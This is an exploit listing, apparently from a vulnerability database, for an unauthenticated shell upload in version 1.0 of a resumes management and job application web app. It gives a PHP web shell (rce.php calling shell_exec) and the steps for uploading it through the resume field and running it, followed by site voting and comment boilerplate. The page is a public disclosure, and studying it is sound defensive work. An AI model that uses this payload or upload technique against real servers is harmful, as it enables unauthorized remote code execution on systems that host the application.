Resumes Management And Job Application Website 1.0 Shell Upload

2021.01.04

Credit: Arnav Tripathy

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264

# Exploit Title: Resumes-management-and-job-application-website
unauthenticated RCE
# Date: 3/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://egavilanmedia.com
# Software Link:
https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: linux/lamp
Submit rce.php in resume file upload unauthenticated.Contents of rce.php
<?php
$output = shell_exec('whoami');
echo "<h1>$output</h1>";
?>
Navigate to http://localhost/Resumes Management and Job Application
Website/files/rce.php
You will get the output of whoami

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Resumes Management And Job Application Website 1.0 Shell Upload

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.